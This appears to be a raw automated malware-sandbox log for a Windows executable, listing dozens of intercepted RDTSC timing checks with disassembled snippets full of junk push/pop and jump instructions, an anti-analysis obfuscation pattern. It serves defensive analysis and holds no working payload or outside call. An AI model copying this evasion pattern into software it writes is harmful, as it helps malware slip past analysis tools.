Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15BFF68 second address: 15BFF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15BFF6F second address: 15BFF7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F6FA4524816h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15BFF7B second address: 15BFF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15BFF7F second address: 15BFF83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15BFDAB second address: 15BFDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 ja 00007F6FA52293B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15C67E4 second address: 15C67EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15C6A59 second address: 15C6A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15C6A62 second address: 15C6A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15C6BFC second address: 15C6C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15C6FCA second address: 15C6FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15C6FCE second address: 15C6FF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F6FA52293BEh 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15C6FF8 second address: 15C6FFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15CBA1D second address: 15CBA21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15CBA21 second address: 15CBA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6FA4524827h 0x0000000d jmp 00007F6FA4524821h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6FA4524822h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15CF29E second address: 15CF2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6FA52293C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15CF2AA second address: 15CF2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA452481Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15CF2C0 second address: 15CF2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F6FA52293BAh 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15D1861 second address: 15D1867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15D1867 second address: 15D1874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jo 00007F6FA52293B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1610BEE second address: 1610BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1608EB2 second address: 1608ED3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F6FA52293C8h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1608ED3 second address: 1608EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jc 00007F6FA4524816h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1608EE6 second address: 1608EEC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 161D0B8 second address: 161D0CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F6FA4524816h 0x0000000e jno 00007F6FA4524816h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 161D0CC second address: 161D0D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 161D0D2 second address: 161D0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6FA4524826h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 161D0F3 second address: 161D121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6FA52293C4h 0x00000010 jmp 00007F6FA52293BFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 161D121 second address: 161D157 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6FA4524816h 0x00000008 jno 00007F6FA4524816h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F6FA452481Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6FA4524828h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2AA9 second address: 16E2AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2AAF second address: 16E2AB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2AB3 second address: 16E2AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2AB9 second address: 16E2ABE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2ABE second address: 16E2ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293C4h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2ADD second address: 16E2AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2AE5 second address: 16E2AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E1878 second address: 16E1884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6FA4524816h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E1884 second address: 16E1893 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6FA52293B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E1C94 second address: 16E1C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E1C98 second address: 16E1CB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E1CB2 second address: 16E1CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007F6FA4524816h 0x0000000d pop eax 0x0000000e pop ecx 0x0000000f je 00007F6FA4524828h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E1CCB second address: 16E1CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E1E76 second address: 16E1E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2298 second address: 16E22C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007F6FA52293BDh 0x0000000c jnc 00007F6FA52293B6h 0x00000012 jmp 00007F6FA52293C3h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E25D7 second address: 16E25F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524827h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E25F3 second address: 16E25FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6FA52293B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E277A second address: 16E277E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E277E second address: 16E278F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jne 00007F6FA52293B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E278F second address: 16E27C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA4524822h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F6FA4524825h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E6A26 second address: 16E6A42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E6D02 second address: 16E6D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F6FA4524816h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E6D14 second address: 16E6D2F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6FA52293B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6FA52293BFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E6D2F second address: 16E6D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E9E96 second address: 16E9EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E9EA3 second address: 16E9EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA4524822h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E9EB9 second address: 16E9EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16EB92F second address: 16EB933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16EB933 second address: 16EB954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F6FA52293B8h 0x0000000c pushad 0x0000000d jnp 00007F6FA52293B6h 0x00000013 pushad 0x00000014 popad 0x00000015 jng 00007F6FA52293B6h 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750075 second address: 775017D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6FA452481Fh 0x00000009 add esi, 5BA0856Eh 0x0000000f jmp 00007F6FA4524829h 0x00000014 popfd 0x00000015 mov eax, 17875EF7h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d sub esp, 18h 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F6FA4524828h 0x00000027 sbb ch, 00000018h 0x0000002a jmp 00007F6FA452481Bh 0x0000002f popfd 0x00000030 push esi 0x00000031 pushfd 0x00000032 jmp 00007F6FA452481Fh 0x00000037 add eax, 784720DEh 0x0000003d jmp 00007F6FA4524829h 0x00000042 popfd 0x00000043 pop eax 0x00000044 popad 0x00000045 push ebp 0x00000046 jmp 00007F6FA452481Ch 0x0000004b mov dword ptr [esp], ebx 0x0000004e jmp 00007F6FA4524820h 0x00000053 mov ebx, dword ptr [eax+10h] 0x00000056 jmp 00007F6FA4524820h 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f pushfd 0x00000060 jmp 00007F6FA452481Dh 0x00000065 adc esi, 217D3326h 0x0000006b jmp 00007F6FA4524821h 0x00000070 popfd 0x00000071 jmp 00007F6FA4524820h 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775017D second address: 7750212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6FA52293C9h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 push eax 0x00000012 call 00007F6FA52293C3h 0x00000017 pop esi 0x00000018 pop edi 0x00000019 mov bx, cx 0x0000001c popad 0x0000001d mov esi, dword ptr [770206ECh] 0x00000023 jmp 00007F6FA52293C0h 0x00000028 test esi, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov ax, dx 0x00000030 pushfd 0x00000031 jmp 00007F6FA52293C9h 0x00000036 and si, 5756h 0x0000003b jmp 00007F6FA52293C1h 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750212 second address: 7750247 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524821h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F6FA452576Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F6FA4524823h 0x00000017 pop esi 0x00000018 mov ecx, edi 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750247 second address: 77502B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA52293C0h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, edi 0x0000000e jmp 00007F6FA52293BEh 0x00000013 push eax 0x00000014 jmp 00007F6FA52293BBh 0x00000019 xchg eax, edi 0x0000001a jmp 00007F6FA52293C6h 0x0000001f call dword ptr [76FF0B60h] 0x00000025 mov eax, 7571E5E0h 0x0000002a ret 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F6FA52293C7h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77502B0 second address: 77502C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA4524824h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77502C8 second address: 77502E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000044h 0x0000000a pushad 0x0000000b movsx edx, cx 0x0000000e mov si, B435h 0x00000012 popad 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ecx, 6DE4220Fh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77502E5 second address: 7750329 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6FA452481Bh 0x00000009 and ch, 0000001Eh 0x0000000c jmp 00007F6FA4524829h 0x00000011 popfd 0x00000012 movzx esi, dx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6FA452481Fh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750329 second address: 7750358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6FA52293BDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750358 second address: 7750368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA452481Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750368 second address: 775037A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, eax 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775037A second address: 7750380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750420 second address: 7750486 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b pushad 0x0000000c mov cx, 1093h 0x00000010 call 00007F6FA52293C8h 0x00000015 mov ecx, 58593B71h 0x0000001a pop esi 0x0000001b popad 0x0000001c test esi, esi 0x0000001e jmp 00007F6FA52293BDh 0x00000023 je 00007F7014A785F4h 0x00000029 jmp 00007F6FA52293BEh 0x0000002e sub eax, eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750486 second address: 775048C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775048C second address: 77504C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA52293BBh 0x00000008 call 00007F6FA52293C8h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esi], edi 0x00000013 pushad 0x00000014 mov al, dl 0x00000016 movzx esi, di 0x00000019 popad 0x0000001a mov dword ptr [esi+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77504C8 second address: 77504CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77504CC second address: 77504D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77504D0 second address: 77504D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77504D6 second address: 77504DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77504DC second address: 77504E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77504E0 second address: 7750503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b pushad 0x0000000c mov eax, edx 0x0000000e mov bl, 80h 0x00000010 popad 0x00000011 mov dword ptr [esi+0Ch], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6FA52293BDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750503 second address: 775055F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+4Ch] 0x0000000f jmp 00007F6FA452481Bh 0x00000014 mov dword ptr [esi+10h], eax 0x00000017 jmp 00007F6FA4524826h 0x0000001c mov eax, dword ptr [ebx+50h] 0x0000001f jmp 00007F6FA4524820h 0x00000024 mov dword ptr [esi+14h], eax 0x00000027 pushad 0x00000028 movzx esi, di 0x0000002b mov si, bx 0x0000002e popad 0x0000002f mov eax, dword ptr [ebx+54h] 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov si, BBCDh 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775055F second address: 7750595 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+18h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6FA52293C7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750595 second address: 77505C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 13AF5D51h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+58h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F6FA4524829h 0x00000016 mov dh, ch 0x00000018 popad 0x00000019 rdtsc
